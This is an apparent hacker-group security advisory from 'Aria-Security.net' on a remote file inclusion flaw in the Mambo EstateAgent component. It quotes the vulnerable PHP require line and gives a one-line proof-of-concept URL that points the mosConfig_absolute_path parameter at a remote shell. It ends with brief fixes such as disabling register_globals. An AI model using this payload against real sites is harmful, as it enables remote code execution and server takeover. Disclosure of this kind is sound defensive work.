|
###########################################################################################=0D
# Aria-Security.net Advisory #=0D
# Discovered by: O.U.T.L.A.W # =0D
=0D
# < www.Aria-security.net > #=0D
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #=0D
# #=0D
###########################################################################################=0D
=0D
=0D
#Software: Mambo Component - EstateAgent =0D
#Attack method: =0D
#Source:=0D
#=0D
# Don't allow direct linking=0D
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );=0D
=0D
require_once( $mainframe->getPath( 'front_html' ) );=0D
=0D
require($mosConfig_absolute_path."/administrator/components/com_estateagent/configuration.php");=0D
=0D
=0D
************************************************************************************=0D
=0D
=0D
#Proof of Concept: =0D
#=0D
#www.site.com/com_estateagent/estateagent.php?mosConfig_absolute_path=shell=0D
#=0D
=0D
#---------------------------------------------------------- =0D
# =0D
#Solutions : =0D
#1 - If you have access on webserver turn register_globals in php.ini off=0D
#2 - You must give a value before put the value of variable in the include function or check and filter =0D
=0D
#unnormal entrance out . =0D
#=0D
# =0D
#Contact : Outlaw@aria-security.net =0D
=0D
=0D
=0D
=0D